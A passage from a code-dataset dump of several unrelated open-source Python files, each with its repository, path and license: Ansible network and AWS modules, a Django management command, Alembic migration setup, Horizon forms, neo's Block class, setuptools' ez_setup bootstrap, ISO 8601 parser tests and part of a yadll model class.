module.fail_json(msg="Warning! 'group' must be an integer between"
" 1 and 255", group=value)
elif param == 'priority':
try:
if (int(value) < 1 or int(value) > 254):
raise ValueError
except ValueError:
module.fail_json(msg="Warning! 'priority' must be an integer "
"between 1 and 254", priority=value)
def main():
argument_spec = dict(
group=dict(required=True, type='str'),
interface=dict(required=True),
priority=dict(required=False, type='str'),
preempt=dict(required=False, choices=BOOLEANS, type='bool'),
vip=dict(required=False, type='str'),
authentication=dict(required=False, type='str'),
state=dict(choices=['absent', 'present'],
required=False, default='present'),
)
module = get_module(argument_spec=argument_spec,
supports_check_mode=True)
state = module.params['state']
interface = module.params['interface'].lower()
group = module.params['group']
priority = module.params['priority']
preempt = module.params['preempt']
vip = module.params['vip']
authentication = module.params['authentication']
transport = module.params['transport']
if state == 'present' and not vip:
module.fail_json(msg='the "vip" param is required when state=present')
intf_type = get_interface_type(interface)
if (intf_type != 'ethernet' and transport == 'cli'):
if is_default(interface, module) == 'DNE':
module.fail_json(msg='That interface does not exist yet. Create '
'it first.', interface=interface)
if intf_type == 'loopback':
module.fail_json(msg="Loopback interfaces don't support VRRP.",
interface=interface)
mode = get_interface_mode(interface, intf_type, module)
if mode == 'layer2':
module.fail_json(msg='That interface is a layer2 port.\nMake it '
'a layer 3 port first.', interface=interface)
args = dict(group=group, priority=priority, preempt=preempt,
vip=vip, authentication=authentication)
proposed = dict((k, v) for k, v in args.iteritems() if v is not None)
existing = get_existing_vrrp(interface, group, module)
changed = False
end_state = existing
commands = []
if state == 'present':
delta = dict(
set(proposed.iteritems()).difference(existing.iteritems()))
if delta:
command = get_commands_config_vrrp(delta, group)
commands.append(command)
elif state == 'absent':
if existing:
commands.append(['no vrrp {0}'.format(group)])
if commands:
commands.insert(0, ['interface {0}'.format(interface)])
cmds = flatten_list(commands)
if cmds:
if module.check_mode:
module.exit_json(changed=True, commands=cmds)
else:
execute_config_command(cmds, module)
changed = True
end_state = get_existing_vrrp(interface, group, module)
results = {}
results['proposed'] = proposed
results['existing'] = existing
results['state'] = state
results['updates'] = cmds
results['changed'] = changed
results['end_state'] = end_state
module.exit_json(**results)
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
from ansible.module_utils.shell import *
from ansible.module_utils.netcfg import *
from ansible.module_utils.nxos import *
if __name__ == '__main__':
main() | gpl-3.0 |
haxoza/django | django/core/management/commands/sendtestemail.py | 349 | 1449 | import socket
from django.core.mail import mail_admins, mail_managers, send_mail
from django.core.management.base import BaseCommand
from django.utils import timezone
class Command(BaseCommand):
help = "Sends a test email to the email addresses specified as arguments."
missing_args_message = "You must specify some email recipients, or pass the --managers or --admin options."
def add_arguments(self, parser):
parser.add_argument('email', nargs='*',
help='One or more email addresses to send a test email to.')
parser.add_argument('--managers', action='store_true', dest='managers', default=False,
help='Send a test email to the addresses specified in settings.MANAGERS.')
parser.add_argument('--admins', action='store_true', dest='admins', default=False,
help='Send a test email to the addresses specified in settings.ADMINS.')
def handle(self, *args, **kwargs):
subject = 'Test email from %s on %s' % (socket.gethostname(), timezone.now())
send_mail(
subject=subject,
message="If you\'re reading this, it was successful.",
from_email=None,
recipient_list=kwargs['email'],
)
if kwargs['managers']:
mail_managers(subject, "This email was sent to the site managers.")
if kwargs['admins']:
mail_admins(subject, "This email was sent to the site admins.")
| bsd-3-clause |
gitgik/flask-rest-api | migrations/env.py | 557 | 2883 | from __future__ import with_statement
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import fileConfig
import logging
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
logger = logging.getLogger('alembic.env')
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
from flask import current_app
config.set_main_option('sqlalchemy.url',
current_app.config.get('SQLALCHEMY_DATABASE_URI'))
target_metadata = current_app.extensions['migrate'].db.metadata
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
url = config.get_main_option("sqlalchemy.url")
context.configure(url=url)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
# this callback is used to prevent an auto-migration from being generated
# when there are no changes to the schema
# reference: http://alembic.readthedocs.org/en/latest/cookbook.html
def process_revision_directives(context, revision, directives):
if getattr(config.cmd_opts, 'autogenerate', False):
script = directives[0]
if script.upgrade_ops.is_empty():
directives[:] = []
logger.info('No changes in schema detected.')
engine = engine_from_config(config.get_section(config.config_ini_section),
prefix='sqlalchemy.',
poolclass=pool.NullPool)
connection = engine.connect()
context.configure(connection=connection,
target_metadata=target_metadata,
process_revision_directives=process_revision_directives,
**current_app.extensions['migrate'].configure_args)
try:
with context.begin_transaction():
context.run_migrations()
finally:
connection.close()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
| mit |
RudoCris/horizon | openstack_dashboard/dashboards/identity/roles/forms.py | 91 | 1701 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard import api
class CreateRoleForm(forms.SelfHandlingForm):
name = forms.CharField(label=_("Role Name"))
def handle(self, request, data):
try:
new_user = api.keystone.role_create(request, data["name"])
messages.success(request, _("Role created successfully."))
return new_user
except Exception:
exceptions.handle(request, _('Unable to create role.'))
class UpdateRoleForm(forms.SelfHandlingForm):
id = forms.CharField(label=_("ID"), widget=forms.HiddenInput)
name = forms.CharField(label=_("Role Name"))
def handle(self, request, data):
try:
api.keystone.role_update(request, data['id'], data["name"])
messages.success(request, _("Role updated successfully."))
return True
except Exception:
exceptions.handle(request, _('Unable to update role.'))
| apache-2.0 |
apdavison/python-neo | neo/core/block.py | 3 | 4982 | '''
This module defines :class:`Block`, the main container gathering all the data,
whether discrete or continous, for a given recording session. base class
used by all :module:`neo.core` classes.
:class:`Block` derives from :class:`Container`,
from :module:`neo.core.container`.
'''
from datetime import datetime
from neo.core.container import Container, unique_objs
class Block(Container):
'''
Main container gathering all the data, whether discrete or continous, for a
given recording session.
A block is not necessarily temporally homogeneous, in contrast to :class:`Segment`.
*Usage*::
>>> from neo.core import Block, Segment, Group, AnalogSignal
>>> from quantities import nA, kHz
>>> import numpy as np
>>>
>>> # create a Block with 3 Segment and 2 Group objects
,,, blk = Block()
>>> for ind in range(3):
... seg = Segment(name='segment %d' % ind, index=ind)
... blk.segments.append(seg)
...
>>> for ind in range(2):
... group = Group(name='Array probe %d' % ind)
... blk.groups.append(group)
...
>>> # Populate the Block with AnalogSignal objects
... for seg in blk.segments:
... for group in blk.groups:
... a = AnalogSignal(np.random.randn(10000, 64)*nA,
... sampling_rate=10*kHz)
... group.analogsignals.append(a)
... seg.analogsignals.append(a)
*Required attributes/properties*:
None
*Recommended attributes/properties*:
:name: (str) A label for the dataset.
:description: (str) Text description.
:file_origin: (str) Filesystem path or URL of the original data file.
:file_datetime: (datetime) The creation date and time of the original
data file.
:rec_datetime: (datetime) The date and time of the original recording.
*Properties available on this object*:
:list_units: (deprecated) descends through hierarchy and returns a list of
:class:`Unit` objects existing in the block. This shortcut exists
because a common analysis case is analyzing all neurons that
you recorded in a session.
Note: Any other additional arguments are assumed to be user-specific
metadata and stored in :attr:`annotations`.
*Container of*:
:class:`Segment`
:class:`Group`
:class:`ChannelIndex` (deprecated)
'''
_container_child_objects = ('Segment', 'ChannelIndex', 'Group')
_child_properties = ('Unit',)
_recommended_attrs = ((('file_datetime', datetime),
('rec_datetime', datetime),
('index', int)) +
Container._recommended_attrs)
_repr_pretty_attrs_keys_ = (Container._repr_pretty_attrs_keys_ +
('file_origin', 'file_datetime',
'rec_datetime', 'index'))
_repr_pretty_containers = ('segments',)
def __init__(self, name=None, description=None, file_origin=None,
file_datetime=None, rec_datetime=None, index=None,
**annotations):
'''
Initalize a new :class:`Block` instance.
'''
super().__init__(name=name, description=description,
file_origin=file_origin, **annotations)
self.file_datetime = file_datetime
self.rec_datetime = rec_datetime
self.index = index
self.regionsofinterest = [] # temporary workaround.
# the goal is to store all sub-classes of RegionOfInterest in a single list
# but this will need substantial changes to container handling
@property
def data_children_recur(self):
'''
All data child objects stored in the current object,
obtained recursively.
'''
# subclassing this to remove duplicate objects such as SpikeTrain
# objects in both Segment and Unit
# Only Block can have duplicate items right now, so implement
# this here for performance reasons.
return tuple(unique_objs(super().data_children_recur))
def list_children_by_class(self, cls):
'''
List all children of a particular class recursively.
You can either provide a class object, a class name,
or the name of the container storing the class.
'''
# subclassing this to remove duplicate objects such as SpikeTrain
# objects in both Segment and Unit
# Only Block can have duplicate items right now, so implement
# this here for performance reasons.
return unique_objs(super().list_children_by_class(cls))
@property
def list_units(self):
'''
Return a list of all :class:`Unit` objects in the :class:`Block`.
'''
return self.list_children_by_class('unit')
| bsd-3-clause |
eceglov/phantomjs | src/breakpad/src/third_party/protobuf/protobuf/python/ez_setup.py | 454 | 10334 | #!python
# This file was obtained from:
# http://peak.telecommunity.com/dist/ez_setup.py
# on 2011/1/21.
"""Bootstrap setuptools installation
If you want to use setuptools in your package's setup.py, just include this
file in the same directory with it, and add this to the top of your setup.py::
from ez_setup import use_setuptools
use_setuptools()
If you want to require a specific version of setuptools, set a download
mirror, or use an alternate download directory, you can do so by supplying
the appropriate options to ``use_setuptools()``.
This file can also be run as a script to install or upgrade setuptools.
"""
import sys
DEFAULT_VERSION = "0.6c11"
DEFAULT_URL = "http://pypi.python.org/packages/%s/s/setuptools/" % sys.version[:3]
md5_data = {
'setuptools-0.6b1-py2.3.egg': '8822caf901250d848b996b7f25c6e6ca',
'setuptools-0.6b1-py2.4.egg': 'b79a8a403e4502fbb85ee3f1941735cb',
'setuptools-0.6b2-py2.3.egg': '5657759d8a6d8fc44070a9d07272d99b',
'setuptools-0.6b2-py2.4.egg': '4996a8d169d2be661fa32a6e52e4f82a',
'setuptools-0.6b3-py2.3.egg': 'bb31c0fc7399a63579975cad9f5a0618',
'setuptools-0.6b3-py2.4.egg': '38a8c6b3d6ecd22247f179f7da669fac',
'setuptools-0.6b4-py2.3.egg': '62045a24ed4e1ebc77fe039aa4e6f7e5',
'setuptools-0.6b4-py2.4.egg': '4cb2a185d228dacffb2d17f103b3b1c4',
'setuptools-0.6c1-py2.3.egg': 'b3f2b5539d65cb7f74ad79127f1a908c',
'setuptools-0.6c1-py2.4.egg': 'b45adeda0667d2d2ffe14009364f2a4b',
'setuptools-0.6c10-py2.3.egg': 'ce1e2ab5d3a0256456d9fc13800a7090',
'setuptools-0.6c10-py2.4.egg': '57d6d9d6e9b80772c59a53a8433a5dd4',
'setuptools-0.6c10-py2.5.egg': 'de46ac8b1c97c895572e5e8596aeb8c7',
'setuptools-0.6c10-py2.6.egg': '58ea40aef06da02ce641495523a0b7f5',
'setuptools-0.6c11-py2.3.egg': '2baeac6e13d414a9d28e7ba5b5a596de',
'setuptools-0.6c11-py2.4.egg': 'bd639f9b0eac4c42497034dec2ec0c2b',
'setuptools-0.6c11-py2.5.egg': '64c94f3bf7a72a13ec83e0b24f2749b2',
'setuptools-0.6c11-py2.6.egg': 'bfa92100bd772d5a213eedd356d64086',
'setuptools-0.6c2-py2.3.egg': 'f0064bf6aa2b7d0f3ba0b43f20817c27',
'setuptools-0.6c2-py2.4.egg': '616192eec35f47e8ea16cd6a122b7277',
'setuptools-0.6c3-py2.3.egg': 'f181fa125dfe85a259c9cd6f1d7b78fa',
'setuptools-0.6c3-py2.4.egg': 'e0ed74682c998bfb73bf803a50e7b71e',
'setuptools-0.6c3-py2.5.egg': 'abef16fdd61955514841c7c6bd98965e',
'setuptools-0.6c4-py2.3.egg': 'b0b9131acab32022bfac7f44c5d7971f',
'setuptools-0.6c4-py2.4.egg': '2a1f9656d4fbf3c97bf946c0a124e6e2',
'setuptools-0.6c4-py2.5.egg': '8f5a052e32cdb9c72bcf4b5526f28afc',
'setuptools-0.6c5-py2.3.egg': 'ee9fd80965da04f2f3e6b3576e9d8167',
'setuptools-0.6c5-py2.4.egg': 'afe2adf1c01701ee841761f5bcd8aa64',
'setuptools-0.6c5-py2.5.egg': 'a8d3f61494ccaa8714dfed37bccd3d5d',
'setuptools-0.6c6-py2.3.egg': '35686b78116a668847237b69d549ec20',
'setuptools-0.6c6-py2.4.egg': '3c56af57be3225019260a644430065ab',
'setuptools-0.6c6-py2.5.egg': 'b2f8a7520709a5b34f80946de5f02f53',
'setuptools-0.6c7-py2.3.egg': '209fdf9adc3a615e5115b725658e13e2',
'setuptools-0.6c7-py2.4.egg': '5a8f954807d46a0fb67cf1f26c55a82e',
'setuptools-0.6c7-py2.5.egg': '45d2ad28f9750e7434111fde831e8372',
'setuptools-0.6c8-py2.3.egg': '50759d29b349db8cfd807ba8303f1902',
'setuptools-0.6c8-py2.4.egg': 'cba38d74f7d483c06e9daa6070cce6de',
'setuptools-0.6c8-py2.5.egg': '1721747ee329dc150590a58b3e1ac95b',
'setuptools-0.6c9-py2.3.egg': 'a83c4020414807b496e4cfbe08507c03',
'setuptools-0.6c9-py2.4.egg': '260a2be2e5388d66bdaee06abec6342a',
'setuptools-0.6c9-py2.5.egg': 'fe67c3e5a17b12c0e7c541b7ea43a8e6',
'setuptools-0.6c9-py2.6.egg': 'ca37b1ff16fa2ede6e19383e7b59245a',
}
import sys, os
try: from hashlib import md5
except ImportError: from md5 import md5
def _validate_md5(egg_name, data):
if egg_name in md5_data:
digest = md5(data).hexdigest()
if digest != md5_data[egg_name]:
print >>sys.stderr, (
"md5 validation of %s failed! (Possible download problem?)"
% egg_name
)
sys.exit(2)
return data
def use_setuptools(
version=DEFAULT_VERSION, download_base=DEFAULT_URL, to_dir=os.curdir,
download_delay=15
):
"""Automatically find/download setuptools and make it available on sys.path
`version` should be a valid setuptools version number that is available
as an egg for download under the `download_base` URL (which should end with
a '/'). `to_dir` is the directory where setuptools will be downloaded, if
it is not already available. If `download_delay` is specified, it should
be the number of seconds that will be paused before initiating a download,
should one be required. If an older version of setuptools is installed,
this routine will print a message to ``sys.stderr`` and raise SystemExit in
an attempt to abort the calling script.
"""
was_imported = 'pkg_resources' in sys.modules or 'setuptools' in sys.modules
def do_download():
egg = download_setuptools(version, download_base, to_dir, download_delay)
sys.path.insert(0, egg)
import setuptools; setuptools.bootstrap_install_from = egg
try:
import pkg_resources
except ImportError:
return do_download()
try:
pkg_resources.require("setuptools>="+version); return
except pkg_resources.VersionConflict, e:
if was_imported:
print >>sys.stderr, (
"The required version of setuptools (>=%s) is not available, and\n"
"can't be installed while this script is running. Please install\n"
" a more recent version first, using 'easy_install -U setuptools'."
"\n\n(Currently using %r)"
) % (version, e.args[0])
sys.exit(2)
except pkg_resources.DistributionNotFound:
pass
del pkg_resources, sys.modules['pkg_resources'] # reload ok
return do_download()
def download_setuptools(
version=DEFAULT_VERSION, download_base=DEFAULT_URL, to_dir=os.curdir,
delay = 15
):
"""Download setuptools from a specified location and return its filename
`version` should be a valid setuptools version number that is available
as an egg for download under the `download_base` URL (which should end
with a '/'). `to_dir` is the directory where the egg will be downloaded.
`delay` is the number of seconds to pause before an actual download attempt.
"""
import urllib2, shutil
egg_name = "setuptools-%s-py%s.egg" % (version,sys.version[:3])
url = download_base + egg_name
saveto = os.path.join(to_dir, egg_name)
src = dst = None
if not os.path.exists(saveto): # Avoid repeated downloads
try:
from distutils import log
if delay:
log.warn("""
---------------------------------------------------------------------------
This script requires setuptools version %s to run (even to display
help). I will attempt to download it for you (from
%s), but
you may need to enable firewall access for this script first.
I will start the download in %d seconds.
(Note: if this machine does not have network access, please obtain the file
%s
and place it in this directory before rerunning this script.)
---------------------------------------------------------------------------""",
version, download_base, delay, url
); from time import sleep; sleep(delay)
log.warn("Downloading %s", url)
src = urllib2.urlopen(url)
# Read/write all in one block, so we don't create a corrupt file
# if the download is interrupted.
data = _validate_md5(egg_name, src.read())
dst = open(saveto,"wb"); dst.write(data)
finally:
if src: src.close()
if dst: dst.close()
return os.path.realpath(saveto)
def main(argv, version=DEFAULT_VERSION):
"""Install or upgrade setuptools and EasyInstall"""
try:
import setuptools
except ImportError:
egg = None
try:
egg = download_setuptools(version, delay=0)
sys.path.insert(0,egg)
from setuptools.command.easy_install import main
return main(list(argv)+[egg]) # we're done here
finally:
if egg and os.path.exists(egg):
os.unlink(egg)
else:
if setuptools.__version__ == '0.0.1':
print >>sys.stderr, (
"You have an obsolete version of setuptools installed. Please\n"
"remove it from your system entirely before rerunning this script."
)
sys.exit(2)
req = "setuptools>="+version
import pkg_resources
try:
pkg_resources.require(req)
except pkg_resources.VersionConflict:
try:
from setuptools.command.easy_install import main
except ImportError:
from easy_install import main
main(list(argv)+[download_setuptools(delay=0)])
sys.exit(0) # try to force an exit
else:
if argv:
from setuptools.command.easy_install import main
main(argv)
else:
print "Setuptools version",version,"or greater has been installed."
print '(Run "ez_setup.py -U setuptools" to reinstall or upgrade.)'
def update_md5(filenames):
"""Update our built-in md5 registry"""
import re
for name in filenames:
base = os.path.basename(name)
f = open(name,'rb')
md5_data[base] = md5(f.read()).hexdigest()
f.close()
data = [" %r: %r,\n" % it for it in md5_data.items()]
data.sort()
repl = "".join(data)
import inspect
srcfile = inspect.getsourcefile(sys.modules[__name__])
f = open(srcfile, 'rb'); src = f.read(); f.close()
match = re.search("\nmd5_data = {\n([^}]+)}", src)
if not match:
print >>sys.stderr, "Internal error!"
sys.exit(2)
src = src[:match.start(1)] + repl + src[match.end(1):]
f = open(srcfile,'w')
f.write(src)
f.close()
if __name__=='__main__':
if len(sys.argv)>2 and sys.argv[1]=='--md5update':
update_md5(sys.argv[2:])
else:
main(sys.argv[1:])
| bsd-3-clause |
JaDogg/__py_playground | reference/parsley/examples/test_iso8601.py | 3 | 1888 | import datetime
import unittest
import pytest
pytz = pytest.importorskip('pytz')
from iso8601 import DateTimeParser
class TestDatetimeParsing(unittest.TestCase):
def test_date(self):
self.assertEqual(
datetime.date(2001, 12, 25),
DateTimeParser('2001-12-25').date())
def test_naive_time(self):
self.assertEqual(
datetime.time(13, 59, 43),
DateTimeParser('13:59:43').naive_time())
def test_fractional_naive_time(self):
self.assertEqual(
datetime.time(13, 59, 43, 880000),
DateTimeParser('13:59:43.88').naive_time())
def test_utc_time(self):
self.assertEqual(
datetime.time(13, 59, 43, tzinfo=pytz.UTC),
DateTimeParser('13:59:43Z').time())
def test_fractional_utc_time(self):
self.assertEqual(
datetime.time(13, 59, 43, 880000, tzinfo=pytz.UTC),
DateTimeParser('13:59:43.88Z').time())
def test_timezone_time(self):
self.assertEqual(
datetime.time(13, 59, 43, tzinfo=pytz.FixedOffset(60)),
DateTimeParser('13:59:43+01:00').time())
def test_fractional_timezone_time(self):
self.assertEqual(
datetime.time(13, 59, 43, 770000, tzinfo=pytz.FixedOffset(60)),
DateTimeParser('13:59:43.77+01:00').time())
def test_numeric_offset(self):
get_offset = lambda x: DateTimeParser(x).numeric_offset()
self.assertEqual(pytz.FixedOffset(0), get_offset('+00:00'))
self.assertEqual(pytz.FixedOffset(90), get_offset('+01:30'))
self.assertEqual(pytz.FixedOffset(-150), get_offset('-02:30'))
def test_datetime(self):
self.assertEqual(
datetime.datetime(
2001, 12, 25, 13, 59, 43, 770000, tzinfo=pytz.UTC),
DateTimeParser('2001-12-25T13:59:43.77Z').datetime())
| mit |
jhawkesworth/ansible-modules-extras | cloud/amazon/ec2_vpc_dhcp_options_facts.py | 31 | 5118 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc_dhcp_options_facts
short_description: Gather facts about dhcp options sets in AWS
description:
- Gather facts about dhcp options sets in AWS
version_added: "2.2"
requirements: [ boto3 ]
author: "Nick Aslanidis (@naslanidis)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value. See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeRouteTables.html) for possible filters.
required: false
default: null
DhcpOptionsIds:
description:
- Get details of specific DHCP Option ID
- Provide this value as a list
required: false
default: None
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# # Note: These examples do not set authentication details, see the AWS Guide for details.
- name: Gather facts about all DHCP Option sets for an account or profile
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
register: dhcp_facts
- name: Gather facts about a filtered list of DHCP Option sets
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
filters:
"tag:Name": "abc-123"
register: dhcp_facts
- name: Gather facts about a specific DHCP Option set by DhcpOptionId
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
DhcpOptionsIds: dopt-123fece2
register: dhcp_facts
'''
RETURN = '''
dhcp_options:
description: The dhcp option sets for the account
returned: always
type: list
changed:
description: True if listing the dhcp options succeeds
type: bool
returned: always
'''
import json
try:
import botocore
import boto3
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def get_dhcp_options_info(dhcp_option):
dhcp_option_info = {'DhcpOptionsId': dhcp_option['DhcpOptionsId'],
'DhcpConfigurations': dhcp_option['DhcpConfigurations'],
'Tags': dhcp_option['Tags']
}
return dhcp_option_info
def list_dhcp_options(client, module):
dryrun = module.params.get("DryRun")
all_dhcp_options_array = []
params = dict()
if module.params.get('filters'):
params['Filters'] = []
for key, value in module.params.get('filters').iteritems():
temp_dict = dict()
temp_dict['Name'] = key
if isinstance(value, basestring):
temp_dict['Values'] = [value]
else:
temp_dict['Values'] = value
params['Filters'].append(temp_dict)
if module.params.get("DryRun"):
params['DryRun'] = module.params.get("DryRun")
if module.params.get("DhcpOptionsIds"):
params['DhcpOptionsIds'] = module.params.get("DhcpOptionsIds")
try:
all_dhcp_options = client.describe_dhcp_options(**params)
except botocore.exceptions.ClientError as e:
module.fail_json(msg=str(e))
for dhcp_option in all_dhcp_options['DhcpOptions']:
all_dhcp_options_array.append(get_dhcp_options_info(dhcp_option))
snaked_dhcp_options_array = []
for dhcp_option in all_dhcp_options_array:
snaked_dhcp_options_array.append(camel_dict_to_snake_dict(dhcp_option))
module.exit_json(dhcp_options=snaked_dhcp_options_array)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters = dict(type='dict', default=None, ),
DryRun = dict(type='bool', default=False),
DhcpOptionsIds = dict(type='list', default=None)
)
)
module = AnsibleModule(argument_spec=argument_spec)
# Validate Requirements
if not HAS_BOTO3:
module.fail_json(msg='json and botocore/boto3 is required.')
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
connection = boto3_conn(module, conn_type='client', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except botocore.exceptions.NoCredentialsError as e:
module.fail_json(msg="Can't authorize connection - "+str(e))
# call your function here
results = list_dhcp_options(connection, module)
module.exit_json(result=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 |
pchavanne/yadll | yadll/model.py | 2 | 16213 | # -*- coding: UTF-8 -*-
import pickle
import sys
import yadll
from .layers import *
from .exceptions import *
import logging
logger = logging.getLogger(__name__)
def save_model(model, file=None):
"""
Save the model to file with cPickle
This function is used by the training function to save the model.
Parameters
----------
model : :class:`yadll.model.Model`
model to be saved in file
file : `string`
file name
"""
if file is None:
if model.file is None:
logger.error('No file name. Model not saved.')
return
else:
d_file = model.file
else:
d_file = file
try:
with open(d_file, 'wb') as f:
pickle.dump(model, f, pickle.HIGHEST_PROTOCOL)
except RuntimeError:
sys.setrecursionlimit(5000)
with open(d_file, 'wb') as f:
pickle.dump(model, f, pickle.HIGHEST_PROTOCOL)
def load_model(file):
"""
load (unpickle) a saved model
Parameters
----------
file : `string'
file name
Returns
-------
a :class:`yadll.model.Model`
Examples
--------
>>> my_model = load_model('my_best_model.ym')
"""
with open(file, 'rb') as f:
model = pickle.load(f)
return model
class Model(object):
"""
The :class:`yadll.model.Model` contains the data, the network, the hyperparameters,
and the report.
It pre-trains unsupervised layers, trains the network and save it to file.
Parameters
----------
network : :class:`yadll.network.Network`
the network to be trained
data : :class:`yadll.data.Data`
the training, validating and testing set
name : `string`
the name of the model
updates : :func:`yadll.updates`
an update function
file : `string`
name of the file to save the model. If omitted a name is generated with
the model name + date + time of training
"""
def __init__(self, network=None, data=None, hyperparameters=None, name='model',
updates=sgd, objective=CCE, evaluation_metric=categorical_accuracy, file=None):
self.network = network
self.data = data # data [(train_set_x, train_set_y), (valid_set_x, valid_set_y), (test_set_x, test_set_y)]
self.data_shape = None
self.has_validation = None
self.name = name
self.hp = hyperparameters
self.updates = updates
self.objective = objective
self.metric = evaluation_metric
self.early_stop = None
self.file = file
self.save_mode = None # None, 'end' or 'each'
self.index = T.iscalar() # index to a [mini]batch
self.epoch_index = T.ivector() # index per epoch
self.x = self.y = None # T.matrix(name='y')
self.train_func = self.validate_func = self.test_func = self.predict_func = None
self.report = dict()
@timer(' Compiling')
def compile(self, compile_arg):
"""
Compile theano functions of the model
Parameters
----------
compile_arg: `string` or `List` of `string`
value can be 'train', 'validate', 'test', 'predict' and 'all'
"""
if self.data is None and self.data_shape is None:
raise NoDataFoundException
if self.data_shape is None:
self.data_shape = self.data.shape()
# X & Y get their shape from data
if self.x is None:
x_dim = len(self.data_shape[0][0])
x_tensor_type = T.TensorType(dtype=floatX, broadcastable=(False,)*x_dim)
self.x = x_tensor_type('x')
if self.y is None:
y_dim = len(self.data_shape[0][1])
y_tensor_type = T.TensorType(dtype=floatX, broadcastable=(False,)*y_dim)
self.y = y_tensor_type('y')
if self.network is None:
raise NoNetworkFoundException
else:
if self.network.layers[0].input is None:
self.network.layers[0].input = self.x
################################################
# cost
cost = T.mean(self.objective(prediction=self.network.get_output(stochastic=True), target=self.y))
# add regularisation
cost += self.network.reguls
################################################
# Updates
# updates of the model as a list of (variable, update expression) pairs
update_param = {}
if hasattr(self.hp, 'learning_rate'):
update_param['learning_rate'] = self.hp.learning_rate
if hasattr(self.hp, 'momentum'):
update_param['momentum'] = self.hp.momentum
if hasattr(self.hp, 'epsilon'):
update_param['epsilon'] = self.hp.epsilon
if hasattr(self.hp, 'rho'):
update_param['rho'] = self.hp.rho
if hasattr(self.hp, 'beta1'):
update_param['beta1'] = self.hp.beta1
if hasattr(self.hp, 'beta2'):
update_param['beta2'] = self.hp.beta1
updates = self.updates(cost, self.network.params, **update_param)
################################################
# Validation & Test functions
error = categorical_error(self.network.get_output(stochastic=False), self.y)
################################################
# functions for training, validating and testing the model
logger.info('... Compiling the model')
if 'train' in compile_arg or 'all' in compile_arg:
self.train_func = theano.function(inputs=[self.index, self.epoch_index], outputs=cost, updates=updates, name='train', # on_unused_input='ignore', # mode='DebugMode',
givens={self.x: self.data.train_set_x[self.epoch_index[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size]],
self.y: self.data.train_set_y[self.epoch_index[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size]]})
if 'validate' in compile_arg or 'all' in compile_arg:
self.validate_func = theano.function(inputs=[self.index], outputs=error, name='validate',
givens={self.x: self.data.valid_set_x[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size],
self.y: self.data.valid_set_y[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size]})
if 'test' in compile_arg or 'all' in compile_arg:
self.test_func = theano.function(inputs=[self.index], outputs=error, name='test',
givens={self.x: self.data.test_set_x[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size],
self.y: self.data.test_set_y[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size]})
################################################
# functions for predicting
if 'predict' in compile_arg or 'all' in compile_arg:
prediction = self.network.get_output(stochastic=False)
self.predict_func = theano.function(inputs=[self.x], outputs=prediction, name='predict')
@timer(' Unsupervised Pre-Training')
def pretrain(self):
"""
Pre-training of the unsupervised layers sequentially
Returns
-------
update unsupervised layers weights
"""
if self.data is None:
raise NoDataFoundException
if self.network is None:
raise NoNetworkFoundException
else:
if self.network.layers[0].input is None:
self.network.layers[0].input = self.x
for layer in self.network.layers:
if isinstance(layer, UnsupervisedLayer):
layer.unsupervised_training(self.x, self.data.train_set_x)
@timer(' Training')
def train(self, unsupervised_training=True, save_mode=None, early_stop=True, shuffle=True, **kwargs):
"""
Training the network
Parameters
----------
unsupervised_training: `bool`, (default is True)
pre-training of the unsupervised layers if any
save_mode : {None, 'end', 'each'}
None (default), model will not be saved unless name specified in the
model definition.
'end', model will only be saved at the end of the training
'each', model will be saved each time the model is improved
early_stop : `bool`, (default is True)
early stopping when validation score is not improving
shuffle : `bool`, (default is True)
reshuffle the training set at each epoch. Batches will then be different from one epoch to another
Returns
-------
